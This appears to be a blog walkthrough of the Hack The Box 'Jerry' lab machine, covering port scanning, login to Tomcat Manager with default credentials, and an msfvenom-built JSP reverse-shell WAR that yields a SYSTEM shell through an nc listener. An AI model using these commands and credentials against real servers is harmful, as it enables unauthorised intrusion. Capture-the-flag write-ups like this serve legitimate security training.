Posts Hack The Box - Jerry (Without Metasploit)
Post
Cancel

Hack The Box - Jerry (Without Metasploit)

Configuration

The operating system that I will be using to tackle this machine is a Kali Linux VM.

What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts.

1
$ echo "10.10.10.95 jerry.htb" | sudo tee -a /etc/hosts

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
$ rustscan --accessible -a jerry.htb -r 1-65535 -- -sT -sV -sC -Pn
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.95:8080
Starting Script(s)
Script to be run Some("nmap -vvv -p  ")

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 20:00 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
Initiating Connect Scan at 20:00
Scanning jerry.htb (10.10.10.95) [1 port]
Discovered open port 8080/tcp on 10.10.10.95
Completed Connect Scan at 20:00, 0.02s elapsed (1 total ports)
Initiating Service scan at 20:00
Scanning 1 service on jerry.htb (10.10.10.95)
Completed Service scan at 20:00, 6.61s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.95.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.41s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.04s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
Nmap scan report for jerry.htb (10.10.10.95)
Host is up, received user-set (0.016s latency).
Scanned at 2021-01-16 20:00:28 UTC for 7s

PORT     STATE SERVICE REASON  VERSION
8080/tcp open  http    syn-ack Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds

Enumeration

Port 8080 Apache Tomcat/Coyote JSP engine 1.1

We are presented with the Apache Tomcat’s interface. When we clicked on Manager App, we are prompted for credentials.

I tried the default credentials tomcat:s3cret and it logged us in!

Exploitation

Since we have access to the Manager App page, this means we can upload a malicious .WAR file which I will be generating with msfvenom.

1
2
3
$ msfvenom -a x64 -p java/jsp_reverse_bind_tcp LHOST=10.10.XX.XX LPORT=1337 -f war > shell.war
Payload size: 1118 bytes
Final size of war file: 1118 bytes

After it is uploaded, we see that the .WAR file we uploaded has been deployed at /shell.

Now, we setup our nc listener.

1
2
$ rlwrap nc -lvnp 1337                                                             
listening on [any] 1337 ...

And browse to /shell. We will see that on our listener, we get a shell as SYSTEM!

1
2
3
4
5
6
7
8
$ nc -v jerry.htb 80 
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.95] 49464
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

user.txt & root.txt

Both flags are stored as a file called 2 for the price of 1.txt, available in a folder called flags on the Administrator’s Desktop.

1
2
3
4
5
6
7
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004XXXXXXXXXXXXXXXXXXXXXXXXXXXX

root.txt
04a8XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Rooted ! Thank you for reading and look forward for more writeups and articles !

This post is licensed under CC BY 4.0 by the author.